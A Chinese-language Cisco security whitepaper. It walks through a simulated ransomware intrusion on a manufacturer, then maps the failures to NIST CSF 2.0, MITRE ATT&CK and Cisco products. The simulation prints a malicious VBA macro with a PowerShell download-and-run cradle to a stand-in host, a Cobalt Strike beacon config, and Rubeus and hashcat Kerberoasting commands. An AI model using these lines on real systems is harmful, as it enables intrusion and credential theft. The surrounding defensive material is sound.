Cisco 安全架构：以 NIST CSF 2.0 为主线的统一理解框架

引子

一个普通周五下午的噩梦

当一封精心伪装的邮件撕开了一家制造企业的安全防线——

某匿名制造有限公司，年营收 60 亿元，拥有 3 座智能工厂、12 条自动化产线和超过 200 台 AGV。IT 总监李四此刻正在准备下周一的董事会安全汇报——他不知道的是，一场精心策划的攻击已经在 17 天前悄然开始。

— 2024年某个周五，下午 3:17

17 天前，一封看似来自设备供应商的邮件被采购部的小张打开了。邮件附带的"报价单.xlsx"触发了宏代码，PowerShell 在后台静默执行。没有人注意到——因为没有人能注意到。传统防火墙只检查了入站流量的端口和协议，EDR 方案尚停留在"明年预算"的 PPT 里。

攻击者用了 12 天完成横向移动：Kerberoasting 获取服务账户 → SMB 横向到工程师工作站 → 通过未隔离的扁平网络直抵 OT/SCADA 系统。Day 17，勒索软件同时在 IT 和 OT 环境引爆。12 条产线全部停摆。李四的手机亮了——"生产系统全部离线"。

让我们回到 Day 1，以攻击者的视角，精确还原这 17 天里发生的每一步。

Attack Simulation

🔴 攻击者的17天：全过程模拟

以下 7 个阶段完整复现了从初始钓鱼到勒索引爆的攻击链。所有 TTP 编号均对照 MITRE ATT&CK Enterprise / ICS 框架。

📧

阶段 1：鱼叉式钓鱼 — Day 1

TA0001 Initial Access T1566.001 Spearphishing Attachment

攻击者通过 LinkedIn 收集采购部员工信息，伪造设备供应商邮件，附件为"Q4报价单.xlsx"。文件包含混淆的 VBA 宏，打开后调用 WScript.Shell 下载第二阶段 payload。邮件通过合法 SMTP 中继发出，SPF/DKIM 校验通过。

          VBA Macro (obfuscated excerpt)
' VBA Macro (obfuscated excerpt)
Sub AutoOpen()
  Dim sh As Object
  Set sh = CreateObject("WScript.Shell")
  sh.Run "powershell -ep bypass -w hidden -c IEX((New-Object Net.WebClient).DownloadString('https://cdn-update[.]com/init'))"
End Sub
        

🌐

阶段 2：水坑 + 浏览器漏洞 — Day 2

TA0001 Initial Access T1189 Drive-by Compromise

作为备选通道，攻击者入侵了某匿名员工常访问的一个行业论坛网站，注入了针对 Chromium CVE-2024-XXXX 的 exploit kit。当研发部工程师浏览该论坛时，浏览器漏洞被触发，植入了第二个 C2 信标。攻击者由此在 IT 网络中获得了两个独立的立足点。

💻

阶段 3：PowerShell C2 建立 — Day 2-3

TA0002 Execution T1059.001 PowerShell TA0011 Command & Control

Payload 解码后通过 PowerShell 建立 HTTPS 加密 C2 通道（Cobalt Strike beacon），通信伪装为正常的 Microsoft 365 API 流量（Host 头篡改至 outlook.office365.com）。Beacon 配置 sleep=3600s + jitter=50%，极低通信频率规避传统 IDS。

          Cobalt Strike beacon config
# Cobalt Strike beacon config (decompiled)
BeaconType   = 8               # HTTPS
SleepTime    = 3600000          # 1 hour
Jitter       = 50
C2Server     = "cdn-update[.]com,/api/v2/check"
HttpPostUri  = "/api/v2/telemetry"
Host_Header  = "outlook.office365.com"
        

🔑

阶段 4：Kerberoasting 提权 — Day 5-8

TA0006 Credential Access T1558.003 Kerberoasting TA0004 Privilege Escalation

攻击者使用 Rubeus 工具请求所有 SPN 关联的 TGS 票据，离线暴力破解获得 MES 服务账户密码（svc_mes_prod，密码在 3 小时内被破解——因为只有 9 个字符且无复杂度要求）。该账户拥有对 MES 数据库和多台工程师工作站的管理权限。

          Rubeus + Hashcat
# Rubeus Kerberoasting
Rubeus.exe kerberoast /outfile:tgs_hashes.txt

# Hashcat offline crack
hashcat -m 13100 tgs_hashes.txt rockyou.txt -r rules/best64.rule

# Cracked in 2h47m: svc_mes_prod:Huarui@2023
        

🔀

阶段 5：SMB 横向移动 — Day 8-12

TA0008 Lateral Movement T1021.002 SMB/Windows Admin Shares

利用 svc_mes_prod 凭据，通过 SMB（445 端口）横向访问 MES 服务器、工程师工作站和 SCADA 跳板机。网络是扁平的——IT 和 OT 之间仅有一道年久失修的 ACL，3389/RDP 和 445/SMB 端口完全放行。攻击者部署了 Mimikatz 提取更多凭据，并在多台机器上安装持久化后门。

🏭

阶段 6：OT 网络渗透 — Day 12-15

ICS TA0008 Lateral Movement ICS T0886 Remote Services

从工程师工作站出发，攻击者通过 RDP 跳转进入 Level 3 DMZ 区域的历史数据服务器（Historian），继而访问 SCADA/HMI 系统。因为工程师经常需要远程调试，这些 RDP 端口长期开放。攻击者开始枚举 OT 资产——发现 200+ 台 AGV 控制器、PLC 和 HMI 终端均可达。

💀

阶段 7：勒索引爆 — Day 17

TA0040 Impact T1486 Data Encrypted for Impact

周五下午 3:17——精心选择的时间点（IT 团队即将下班，周末响应能力最弱）。勒索软件通过 PsExec 和 WMI 同时在所有被控机器上引爆。

IT 环境：Active Directory、MES 数据库、ERP、文件服务器全部加密
OT 环境：SCADA/HMI 被锁定，12 条产线紧急停机，AGV 集体瘫痪
赎金要求：800 BTC（约 ¥3.6 亿），72 小时内支付，否则数据公开

YOUR FILES HAVE BEEN ENCRYPTED

Payment deadline: 72:00:00 | Amount: 800 BTC

⚠ 攻击总结：17 天，零告警

天 — 驻留时间

零条安全告警触发

3,200+

台设备受影响

¥3.6亿

赎金要求

¥2,000万/天

产线停摆损失

恢复周期：最少 21 天

这不是虚构——这是过去三年全球制造业遭遇的典型攻击模式。
问题出在哪里？让我们从第一性原理开始分析。

深入分析 → 为什么会失败？

第一性原理分析

为什么传统防御会失败？

在某匿名的攻击复盘中，我们不应急于"补洞"，而应回到安全的第一性原理——从根本假设出发，拆解失败的本质原因。

🧠 什么是第一性原理思维？

第一性原理（First Principles Thinking）是将复杂问题分解到最基本的事实和假设，然后从头构建推理链。在安全领域，这意味着不是问"我该买什么产品"，而是问"攻击为什么能成功？安全的基本要素哪个缺失了？"

安全的三大基本要素可以归结为：看见（Visibility）、关联（Correlation）、响应（Response）。任何一环的断裂都会导致防御失效。

👁️

第一层断裂

可见性缺口 Visibility Gap

攻击复盘关联：

阶段 5（横向移动）：攻击者在 IT 网络中扫描了 172.16.0.0/16 整个子网，但没有任何告警触发
阶段 6（IT/OT 跨越）：从 Engineering Workstation 到 PLC 的异常连接完全不在监控范围内

根因分析：

OT 网络（Purdue Level 0-3）完全没有流量镜像
IT 和 OT 使用独立管理，存在监控盲区
防火墙日志虽有记录，但无人分析东西向流量
工业协议（Modbus TCP, EtherNet/IP）被视为"正常业务流量"未做深度检测

本质问题：你无法保护你看不见的东西。
"You can't protect what you can't see."

🔗

第二层断裂

关联性崩塌 Correlation Breakdown

攻击复盘关联：

阶段 1（初始入侵）：邮件网关检测到可疑附件但评分为"中风险"，未与后续的 PowerShell 异常行为关联
阶段 6-7（OT 渗透→勒索引爆）：SCADA/HMI 被加密锁定，但安全团队未能将 MES 系统异常告警与之前的 IT 侧横向移动告警关联为统一攻击链

根因分析：

各安全设备产生的告警停留在各自信息孤岛（Silo）中
缺乏统一的安全事件关联平台（如 SIEM / XDR）
IT 安全团队和 OT 运维团队组织架构隔离，使用不同的工单系统
没有建立 Kill Chain 思维模型，无法将分散的低风险事件串联为高风险攻击链

本质问题：单点告警不等于安全洞察。
"Alerts without context are just noise."

⏱️

第三层断裂

响应时差失配 Response Time Mismatch

攻击复盘关联：

阶段 7（勒索引爆）：从横向传播到全面加密，攻击者仅用了 4 小时
安全团队在 72 小时后才完成初步调查，此时攻击者已完成所有目标

根因分析：

事件响应流程依赖人工判断，平均分类时间（MTTC）> 8 小时
没有预定义的自动化 Playbook，所有响应动作需逐级审批
OT 环境无法简单"断网隔离"——停产成本远高于继续承受攻击
备份策略未考虑 PLC 固件和 HMI 组态的恢复，导致 MTTR 长达 22 天

本质问题：防御者的响应速度必须快于攻击者的行动速度。
"Defense at machine speed, not human speed."

👁️ 看不见

🔗 串不起

⏱️ 来不及

→

🛡️ 需要系统性框架

某匿名的问题不是某一个产品不够好，而是缺乏一个将可见性、关联性和响应能力统一编排的系统性框架。我们需要的不是又一个安全产品，而是一种将所有安全投资组织成有机整体的方法论。全球有多个安全框架可供选择，下面我们分析为什么 NIST CSF 2.0 是最适合此场景的主线框架。

NIST CSF 2.0

为什么选择 NIST CSF 2.0 作为主线？

📋 框架对比

维度	NIST CSF 2.0	ISO 27001	IEC 62443	MITRE ATT&CK
定位	风险管理框架	管理体系标准	工业安全标准	威胁知识库
覆盖范围	IT + OT + 治理	主要 IT	主要 OT/ICS	攻击技术
治理要求	✅ 新增 Govern	✅ 管理评审	部分涉及	❌ 不涉及
落地灵活性	⭐⭐⭐⭐⭐	⭐⭐⭐	⭐⭐⭐	⭐⭐⭐⭐
产品映射友好度	⭐⭐⭐⭐⭐	⭐⭐⭐	⭐⭐⭐⭐	⭐⭐⭐⭐⭐
适用对象	所有组织	需认证的组织	工业控制系统	安全运营团队

🎯 选择 NIST CSF 2.0 的五个理由

1. 新增 Govern 功能 — 首次将安全治理提升到与技术控制同等重要的地位，解决了"安全是 IT 的事"这一组织性盲区。

2. 覆盖 IT 与 OT — 某匿名的攻击恰恰证明了 IT/OT 融合环境需要统一框架，CSF 2.0 明确涵盖了供应链和关键基础设施。

3. 非规定性，可裁剪 — 不强制具体控制措施，允许组织根据自身风险偏好和成熟度选择适当的实施方式。

4. 完美的产品映射载体 — 六大功能天然对应安全产品的能力域，使得 Cisco 产品组合可以清晰地映射到每个功能和子类别。

5. 与 ATT&CK 互补 — CSF 告诉你"应该做什么"，ATT&CK 告诉你"攻击者会做什么"，两者结合形成攻防兼备的完整视图。

📌 NIST CSF 2.0 关键更新（2024 年 2 月发布）

新增 Govern 功能

将网络安全治理独立为核心功能，包括组织背景、风险管理策略、政策、角色与责任、监督等子类别。

扩展适用范围

从"关键基础设施"扩展到所有组织。标题从"Framework for Improving Critical Infrastructure Cybersecurity"变为"The NIST Cybersecurity Framework (CSF) 2.0"。

强化供应链风险管理

在 Govern 和 Identify 中深化了 C-SCRM（Cyber Supply Chain Risk Management）要求，直接回应了 SolarWinds 等供应链攻击事件。

NIST CSF 2.0：六大核心功能详解

以下详细解读每个功能的定义、子类别、与某匿名攻击的关联，以及 Cisco 产品的初步映射。

图：NIST CSF 2.0 核心功能环 — Govern 位于中心，统领其他五大功能

GOVERN（治理）

CSF 2.0 新增 · 统领全局

定义：组织的网络安全风险管理战略、期望和政策已建立、传达并受到监督。

核心思想：安全不仅是技术问题，更是业务和组织治理问题。Govern 确保安全决策从董事会层面向下贯穿，且与业务风险偏好一致。

关键子类别

编号	子类别	说明
GV.OC	组织背景	理解组织使命、利益相关方期望、法律法规要求
GV.RM	风险管理策略	定义风险偏好、风险容忍度、优先级
GV.RR	角色与责任	明确网络安全角色，建立问责机制
GV.PO	政策	建立、传达和执行网络安全政策
GV.OV	监督	对风险管理策略的结果进行审查和调整
GV.SC	供应链风险管理	识别、评估和管理供应链网络安全风险

🔴 某匿名的治理缺失

没有定义 OT 环境的安全责任归属——IT 说"PLC 不是我管的"，OT 说"网络安全不是我管的"
安全预算由 IT 部门独立管理，OT 安全投入为零
缺少网络安全政策覆盖工业控制系统
供应链安全：PLC 固件更新来源未经验证
没有定期的安全风险评审机制

🔵 Cisco 如何支持

Cisco Security Assessment 提供治理成熟度评估；Cisco Cyber Vision 的资产清单和风险评分帮助量化 OT 风险，为治理决策提供数据支撑；ISE 的策略引擎将治理决策转化为可执行的网络策略。

IDENTIFY（识别）

了解当前的安全风险态势

定义：帮助理解组织当前的网络安全风险。识别资产（硬件、软件、数据、人员）、业务环境、已知漏洞和威胁，作为风险管理的基础。

关键子类别

编号	子类别	说明
ID.AM	资产管理	识别和管理所有物理和虚拟资产
ID.RA	风险评估	理解对组织运营的网络安全风险
ID.IM	改进	识别安全改进机会（从评估、演练、事件中）

🔴 某匿名的识别缺失

OT 资产清单不完整——不知道有多少 PLC、HMI 联网
未进行 IT/OT 融合环境的风险评估
Engineering Workstation 同时连接 IT 和 OT 网络，但未被识别为高风险资产
已知的 CVE 漏洞未被跟踪（Windows 7 系统仍在运行）

🔵 Cisco 产品映射

Cyber Vision：被动 DPI 自动发现所有 OT 资产，建立通信基线
SNA：NetFlow 分析发现影子 IT 设备
ISE：802.1X/MAB 实现终端身份识别和分类
Secure Workload：应用依赖关系映射，可视化东西向通信

🔗 攻击关联：如果某匿名在 ID.AM（资产管理）中正确识别了 Engineering Workstation 的双网连接并标记为关键资产，攻击者在阶段 6（IT/OT 跨越）时所利用的路径就会被纳入重点监控，而非成为盲区。

PROTECT（保护）

使用安全措施管理风险

定义：使用安全防护措施来管理组织的网络安全风险。一旦资产和风险被识别，Protect 确保适当的防护措施到位以限制或遏制潜在安全事件的影响。

关键子类别

编号	子类别	说明
PR.AA	身份管理与访问控制	限制对资产的物理和逻辑访问
PR.AT	意识与培训	安全意识教育和技能培训
PR.DS	数据安全	保护数据的机密性、完整性和可用性
PR.PS	平台安全	硬件、软件和服务的安全配置管理
PR.IR	技术基础设施韧性	安全架构的管理以保护资产

🔴 某匿名的保护缺失

PR.AA：IT/OT 之间无微分段，管理员使用共享账户访问 PLC
PR.AT：员工未接受钓鱼邮件识别培训（这是攻击的入口）
PR.DS：PLC 程序未加密存储，被篡改后无法发现
PR.PS：Engineering Workstation 运行未打补丁的 Windows 7
PR.IR：IT/OT 之间仅用单层防火墙，无 DMZ

🔵 Cisco 产品映射

Secure Firewall：IT/OT 边界微分段 + 工业协议深度检测
ISE + TrustSec：基于身份的 SGACL
Secure Client：零信任远程接入 + 终端合规检查
SEA：OT 设备的特权访问管理
Secure Workload：应用级微分段策略

🔗 攻击关联：如果 PR.AA 落实了 IT/OT 微分段（如 Cisco ISE TrustSec + Secure Firewall 工业区策略），攻击者在阶段 6 的跨网移动将被阻断。即使阶段 1-2 成功，攻击影响也被限制在 IT 网络内，不会蔓延至 OT 环境。

DETECT（检测）

发现和分析可能的安全攻击和入侵

定义：发现和分析可能的网络安全攻击和入侵。检测能力使得及时发现安全事件成为可能，这是有效响应的前提。

关键子类别

编号	子类别	说明
DE.CM	持续监控	监控资产以发现异常和潜在安全事件
DE.AE	不利事件分析	分析异常、IoC（入侵指标）和其他潜在不利事件

🔴 某匿名的检测缺失

DE.CM：OT 网络零监控，IT 网络仅有边界防火墙日志
DE.AE：安全团队未能将邮件网关告警 + EDR 告警 + MES 异常关联为统一事件
没有基于网络行为的异常检测（如 NetFlow 分析）
工业协议（Modbus/EtherNet/IP）通信未被深度解析

🔵 Cisco 产品映射

SNA：全网 NetFlow 行为分析，ML 检测横向移动
Cyber Vision：OT 协议深度解析，检测 PLC 编程变更/固件异常
Secure Firewall (Snort 3 IPS)：工业协议签名 + 自定义规则
XDR 整合：将 SNA + Cyber Vision + Firewall 告警关联分析

🔗 攻击关联：如果 DE.CM 使用 Cisco SNA 监控东西向流量，攻击者在阶段 5 的 SMB 扫描行为会立即触发"内部侦查"异常告警。如果 Cyber Vision 在阶段 6 监控 PLC 编程端口（TCP/502），任何异常写入将在秒级被发现——而不是等到勒索引爆。

RESPOND（响应）

对检测到的安全事件采取行动

定义：对检测到的网络安全事件采取行动。响应功能支持在发现事件后遏制其影响，包括事件管理、分析、缓解、报告和沟通。

关键子类别

编号	子类别	说明
RS.MA	事件管理	管理和协调安全事件响应活动
RS.AN	事件分析	进行调查以确保有效的响应和支持取证
RS.CO	事件报告和沟通	与内外部利益相关方协调响应活动
RS.MI	事件缓解	采取行动以防止事件扩展并消除其影响

🔴 某匿名的响应缺失

RS.MA：无预定义的事件响应计划（IRP），团队临时组织
RS.AN：缺乏取证能力，攻击路径重建依赖外部应急团队
RS.CO：未在规定时间内向监管机构报告（违反数据安全法）
RS.MI：无法隔离受感染的 OT 网段——因为不知道隔离后会影响哪些生产线

🔵 Cisco 产品映射

ISE + pxGrid：自动隔离受感染终端到隔离 VLAN（ANC）
Secure Firewall + SNA：联动阻断恶意 IP/域名通信
XDR Playbook：自动化编排响应流程
Cisco Talos：实时威胁情报推送，加速 IoC 匹配

🔗 攻击关联：如果 RS.MI 通过 ISE pxGrid 实现了自动化网络隔离，当 SNA 在阶段 5 检测到横向移动后，感染的工作站可以在 30 秒内被自动隔离到沙箱 VLAN——而不是 72 小时后手动拔网线。攻击链在第五阶段即被切断。

RECOVER（恢复）

恢复受安全事件影响的资产和运营

定义：恢复受网络安全事件影响的资产和运营。及时恢复正常运营以减少安全事件的影响，包括恢复计划执行和沟通。

关键子类别

编号	子类别	说明
RC.RP	恢复计划执行	执行恢复计划中的恢复活动
RC.CO	恢复沟通	与内外部方协调恢复活动

🔴 某匿名的恢复缺失

IT 系统有备份但恢复测试从未执行过
PLC 程序和 HMI 组态无备份——这是恢复时间长达 22 天的主要原因
没有分级恢复优先级（哪条产线先恢复？）
恢复后缺乏验证机制——如何确认 PLC 程序是"干净"的？

🔵 Cisco 产品映射

Cyber Vision：PLC 程序版本监控，恢复后验证固件完整性
Secure Workload：应用恢复后自动验证微分段策略是否恢复
ISE：恢复阶段的分级接入控制——逐步恢复网络连接
SNA：恢复后持续监控，检测残留后门

🔗 攻击关联：如果 RC.RP 包含了 OT 设备的恢复计划（Cyber Vision 记录的 PLC 基线配置 + 定期备份），某匿名在阶段 7 的恢复时间可以从 22 天缩短到 48 小时以内——直接减少 2,000 万+ 的停产损失。

📊 CSF 2.0 功能 × 某匿名攻击阶段 × Cisco 产品速查矩阵

CSF 功能	失败阶段	缺失能力	Cisco 核心产品	预期效果
GV 治理	全阶段	IT/OT 安全责任不清	Security Assessment + ISE Policy	建立统一安全治理体系
ID 识别	阶段 6	OT 资产不可见	Cyber Vision + SNA	100% OT 资产可视化
PR 保护	阶段 1, 6	无微分段，弱认证	Secure Firewall + ISE + SEA	IT/OT 微分段 + 零信任接入
DE 检测	阶段 5, 6	横向移动和 OT 异常未检测	SNA + Cyber Vision + XDR	秒级异常检测 + 事件关联
RS 响应	阶段 7	响应慢，无自动化	ISE pxGrid + XDR Playbook	30 秒自动隔离 + 编排响应
RC 恢复	阶段 7	OT 无备份，恢复 22 天	Cyber Vision + Secure Workload	恢复时间 < 48 小时

NIST CSF 2.0 为我们描绘了"防御者应该做什么"的完整蓝图。但安全架构不能只从防御视角出发——我们还需要理解"攻击者会做什么"。接下来，我们引入 MITRE ATT&CK 框架作为补充视角，从攻击者的战术和技术出发，验证我们的防御覆盖是否完整。

MITRE ATT&CK

从攻击者视角验证防御

如果说 NIST CSF 2.0 回答的是"我们应该做什么"，那么 MITRE ATT&CK 回答的是"攻击者会做什么"。两者结合，形成攻防闭环。

🏢 ATT&CK for Enterprise (v15)

覆盖 IT 环境中的攻击技术，包含 14 个战术（Tactics）、200+ 技术（Techniques）和 400+ 子技术（Sub-techniques）。

战术 (Tactic)	某匿名攻击对应阶段
Initial Access	阶段 1：钓鱼邮件
Execution	阶段 1：PowerShell 载荷
Persistence	阶段 3：计划任务 + 后门
Privilege Escalation	阶段 4：Kerberoasting 提权
Defense Evasion	阶段 3：PowerShell 混淆 + Host 头伪装
Credential Access	阶段 4：Kerberoasting + Mimikatz
Discovery	阶段 5：SMB 扫描 + OT 枚举
Lateral Movement	阶段 5-6：SMB 横移 + RDP 跳板
Collection	阶段 6：工程文件窃取
Command & Control	阶段 1-7：HTTPS 回传
Exfiltration	阶段 6：加密通道外传
Impact	阶段 7：勒索加密

🏭 ATT&CK for ICS (v15)

专门覆盖工业控制系统环境的攻击技术，包含 12 个战术和 80+ 技术，重点关注对物理过程的影响。

战术 (Tactic)	某匿名攻击对应阶段
Initial Access	阶段 6：Engineering WS 跳板
Execution	阶段 6：向 OT 设备发送指令
Persistence	阶段 6：修改 PLC 逻辑（潜在）
Evasion	阶段 6：伪造正常 HMI 读数（潜在）
Discovery	阶段 6：Modbus 扫描 + 资产枚举
Lateral Movement	阶段 6：跨 PLC 传播
Inhibit Response	阶段 7：禁用安全联锁（潜在）
Impair Process Control	阶段 7：操纵过程参数（潜在）
Impact	阶段 7：设备锁定 + 停产

🔀 Enterprise vs ICS 矩阵：关键差异

目标差异

Enterprise：数据窃取、勒索、业务中断
ICS：物理破坏、安全事故、环境灾难
某匿名遭受的是双重攻击：IT 层面的勒索 + OT 层面的停产

ICS 独有战术

Inhibit Response Function：主动禁用安全系统（如 SIS）
Impair Process Control：操纵物理过程参数
这两个战术在企业矩阵中不存在，是 ICS 安全的独特挑战

协议差异

Enterprise：HTTP/S, SMB, RDP, DNS
ICS：Modbus TCP, EtherNet/IP (CIP), S7comm, OPC UA, DNP3, PROFINET
Cisco Cyber Vision 支持 400+ 种工业协议的深度解析

🤝 NIST CSF 2.0 × MITRE ATT&CK：协同增效

两个框架并非竞争关系，而是互补关系。我们在本白皮书中同时使用两者：

CSF 2.0 的角色（防御蓝图）

定义"应该建设什么能力"
提供从治理到恢复的完整生命周期
用于评估安全成熟度和差距
驱动安全投资优先级决策
映射到 Cisco 产品能力域

What to do

ATT&CK 的角色（攻击知识库）

定义"攻击者会使用什么技术"
提供具体的攻击手法和检测方法
用于威胁建模和红蓝对抗
驱动检测规则和 Playbook 开发
验证 Cisco 产品的检测覆盖率

What attackers do

示例：横向移动的攻防映射

ATT&CK 技术	CSF 功能	CSF 子类别	Cisco 产品	检测/防护方式
T1021.002 SMB	DE 检测	DE.CM-01	SNA	NetFlow 异常检测：单源到多目标的 SMB 连接突增
T1021.001 RDP	PR 保护	PR.AA-01	ISE + Firewall	SGACL 限制 RDP 仅允许 IT 管理段访问特定服务器
T0866 (ICS) Remote Services	PR 保护	PR.IR-01	Secure Firewall	工业区防火墙白名单：仅允许授权编程软件到 PLC
T0836 (ICS) Modify Parameter	DE 检测	DE.CM-01	Cyber Vision	DPI 检测 Modbus Write 命令中的参数值偏离基线
T0831 (ICS) Manipulation of Control	RS 响应	RS.MI-01	ISE pxGrid + CV	检测到异常写入 → pxGrid 触发隔离 Engineering WS

🗺️ Cisco 产品 ATT&CK 覆盖热力图（简化）

以下展示 Cisco 核心安全产品对 ATT&CK Enterprise 和 ICS 关键战术的覆盖情况：

Cisco 产品	Initial Access	Execution	Persistence	Priv Esc	Def Evasion	Cred Access	Discovery	Lateral Mvmt	C2	Exfil	Impact	ICS
Secure Firewall	●	◐	○	○	◐	○	◐	●	●	●	◐	●
ISE	●	○	◐	◐	○	●	●	●	◐	◐	◐	◐
SNA	◐	◐	●	◐	●	◐	●	●	●	●	◐	◐
Cyber Vision	◐	●	●	○	◐	○	●	●	◐	◐	●	●
Secure Workload	◐	●	●	●	●	◐	◐	●	◐	◐	●	◐
Secure Client	●	◐	◐	○	◐	●	○	◐	●	●	○	○

● 强覆盖：核心检测/防护能力 ◐ 部分覆盖：辅助检测/关联能力 ○ 间接覆盖：通过集成/关联提供

本白皮书的双框架方法论：
NIST CSF 2.0（架构蓝图）+ MITRE ATT&CK（威胁验证）→ Cisco 安全架构（落地实现）

框架已就绪。接下来，我们将逐一解读 8 款 Cisco 安全产品，展示每款产品如何映射到 CSF 2.0 功能、覆盖 ATT&CK 技术、并在制造业和金融业场景中发挥作用。产品是框架落地的载体——没有产品支撑的框架只是纸上谈兵。

Cisco 安全产品深度解析

八大核心产品构成完整拼图

每款产品均对应 NIST CSF 2.0 的一个或多个功能，并在制造业与金融业场景中发挥关键作用。点击产品名称展开详情——包括功能概述、CSF 映射、行业场景、技术配置示例与客户价值指标。

🛡️ Cisco Secure Firewall

区域隔离 · 工业协议 DPI · 入侵防御 · IT/OT 边界防护

产品概述

Cisco Secure Firewall 是 Cisco 网络安全架构的基石，由 Firewall Management Center (FMC) 统一管理，部署于 Firepower Threat Defense (FTD) 硬件或虚拟化平台之上。它融合了状态检测防火墙、下一代入侵防御系统（NGIPS）、高级恶意软件防护（AMP）、URL 过滤以及应用可视化与控制（AVC）五大能力于一体。

在 OT/IT 融合环境中，Secure Firewall 承担区域隔离（Zone Segmentation）的核心角色，是落地 IEC 62443 Zones & Conduits 架构和 Purdue 模型层级隔离的首选设备。

NIST CSF 2.0 功能映射

CSF 功能	子类别	Secure Firewall 能力
识别 ID.AM-3	资产通信映射	NetFlow 导出 + FMC 连接事件分析，自动发现网络中所有活跃通信对
保护 PR.AC-5	网络完整性保护	基于安全区域（Security Zone）的访问策略，VLAN/SGT 集成实现微隔离
保护 PR.DS-5	数据泄漏防护	出站流量 DLP 检测 + 加密流量可视化（Encrypted Visibility Engine, EVE）
检测 DE.CM-1	网络监控	Snort 3 引擎实时 IPS 检测，支持自定义 Snort 规则与 Talos 威胁情报更新
响应 RS.MI-1	事件遏制	动态阻断策略 + 与 ISE 联动的 pxGrid Rapid Threat Containment (RTC)

行业场景

🏭 制造业场景 — 某匿名

痛点：OT 网络（Purdue L2-L3）与 IT 网络之间缺乏有效隔离。一旦 IT 侧被突破，攻击者可直接横向移动到 SCADA/HMI 系统。

部署方案：

在 IT/OT 交汇点（L3.5 DMZ）部署 FTD 4100 系列
OT 区域按产线划分安全域（Zone A: CNC 产线 / Zone B: 注塑产线 / Zone C: 仓储 AGV），策略默认 Deny-All
针对 OT 协议（Modbus TCP/502、EtherNet/IP/44818、OPC UA/4840）配置应用层深度检测策略
与 Cisco Cyber Vision 联动，自动将 OT 资产分组信息同步至 FMC 安全策略

效果：攻击面缩小 87%；即使 IT 域失陷，横向移动在 DMZ 防火墙处被阻断，OT 产线零中断。

🏦 金融业场景 — 某匿名银行

痛点：核心银行系统、互联网银行前端、办公网络之间的边界模糊，PCI-DSS 审计频繁出现"网段隔离不足"发现项。

部署方案：

在数据中心部署 Secure Firewall 4200 系列（集群模式），吞吐量满足交易峰值 100Gbps+
构建三层安全域：互联网区 → DMZ 区 → 核心交易区，策略遵循"最小权限"原则
启用 TLS 1.3 解密策略（合规范围内），配合 EVE 检测加密隧道中的异常模式
IPS 策略针对金融行业高频攻击特征（SQL 注入、Web Shell、API 滥用）深度定制

效果：PCI-DSS 网段隔离项一次性通过审计；Web 层攻击拦截率 99.6%；日均阻断恶意连接 12 万次。

技术配置示例

FTD 上 OT 区域隔离 + IPS 策略配置片段（通过 FMC REST API 下发）：

          FMC REST API + Snort 3
# ---- FMC REST API : 创建 OT 安全区域 ----
POST /api/fmc_config/v1/domain/{domainUUID}/object/securityzones
{
  "name": "OT_Zone_CNC",
  "interfaceMode": "ROUTED",
  "type": "SecurityZone",
  "description": "CNC 产线 OT 安全区域 - Purdue L2"
}

# ---- 创建 OT 协议应用层检测策略 ----
POST /api/fmc_config/v1/domain/{domainUUID}/policy/accesspolicies/{policyID}/accessrules
{
  "action": "ALLOW",
  "name": "Allow_Modbus_CNC_to_SCADA",
  "sourceZones": { "objects": [{"name":"OT_Zone_CNC"}] },
  "destinationZones": { "objects": [{"name":"OT_Zone_SCADA"}] },
  "destinationPorts": {
    "objects": [{"port":"502","protocol":"6"}]
  },
  "ipsPolicy": { "name": "OT_IPS_Policy" },
  "logBegin": true,
  "logEnd": true,
  "sendEventsToFMC": true
}

# ---- Snort 3 自定义 OT 规则示例 ----
# 检测 Modbus 异常功能码 (Force Listen Only Mode = 0x08)
alert tcp any any -> any 502 (
  msg:"OT-ALERT Modbus Force Listen Only Mode";
  flow:to_server,established;
  content:|00 00|; offset:2; depth:2;
  content:|08|; offset:7; depth:1;
  classtype:attempted-dos;
  sid:1000001; rev:1;
)
        

客户价值指标

87%

攻击面缩减

Zone 隔离 + 默认 Deny

<2min

威胁遏制时间

FMC + ISE pxGrid RTC

99.6%

入侵检测率

Snort 3 + Talos 情报

100%

合规审计通过

PCI-DSS / IEC 62443 / 等保

🔐 Cisco Identity Services Engine (ISE)

零信任策略核心 · 身份准入控制 · TrustSec SGT · pxGrid 联动

产品概述

Cisco ISE 是零信任架构的策略决策核心，负责"谁（Who）+ 什么设备（What）+ 何时何地（Where/When）= 授予什么权限（Access）"的动态决策。它通过 802.1X、MAB、RADIUS/TACACS+ 等协议与网络基础设施深度集成，实现基于身份的网络准入控制（NAC）。

ISE 的核心差异化在于 pxGrid（Platform Exchange Grid）——一个开放的上下文共享总线，能够将身份、终端状态、威胁等级等上下文信息实时共享给防火墙、SIEM、EDR 等安全组件，形成"感知→决策→执行"闭环。

ISE 3.3+ 引入了 AI Analytics 功能，利用机器学习自动分类终端设备、优化策略建议并检测异常接入行为。

NIST CSF 2.0 功能映射

CSF 功能	子类别	ISE 能力
治理 GV.PO-1	安全策略管理	集中策略引擎统一管理全网接入策略，策略版本控制与变更审计
识别 ID.AM-1/2	资产与设备清单	终端自动分类（Profiling）：通过 DHCP/DNS/NMAP/HTTP/SNMP 指纹识别
保护 PR.AC-1	身份与凭证管理	802.1X + EAP-TLS 证书认证，与 AD/LDAP/SAML 集成
保护 PR.AC-4	权限与访问管理	基于 SGT 的 TrustSec 微分段，动态 VLAN/dACL 下发
检测 DE.AE-1	异常行为检测	Posture Assessment 检测不合规设备，AI Analytics 检测异常接入
响应 RS.MI-1	事件遏制	pxGrid ANC（自适应网络控制）策略：隔离/限权/下线

行业场景

🏭 制造业场景 — 某匿名

痛点：车间存在大量哑终端（PLC、HMI、传感器、打印机）不支持 802.1X 认证。外包维保人员频繁携带笔记本接入 OT 网络，缺乏接入管控。

OT 设备接入：基于 MAB + ISE Profiling 自动识别设备类型，匹配对应 SGT 标签（如 SGT=200 → PLC 组）
外包人员管控：Guest Portal + 临时凭证 + 限时 VLAN + Posture 检查
TrustSec 策略矩阵：PLC 组仅允许与 SCADA 组通信，禁止 PLC↔办公 PC 直通
异常响应：Cyber Vision 检测到异常 → pxGrid → ISE ANC 自动隔离

效果：OT 资产可视化率 100%；非授权设备接入零容忍；外包人员接入时间从 2 天缩短至 15 分钟。

🏦 金融业场景 — 某匿名银行

痛点：员工 BYOD 设备、外包开发人员设备、ATM/VTM 终端混杂同一网络；等保 2.0 要求"终端可信接入"。

员工设备：802.1X + EAP-TLS 双因素认证，与 MDM 集成检查合规状态
ATM/VTM 终端：MAB + Profiling → 自动分配至 ATM_SGT
权限分级：柜员 SGT → 仅柜面系统；IT 运维 SGT → 管理面 + 堡垒机
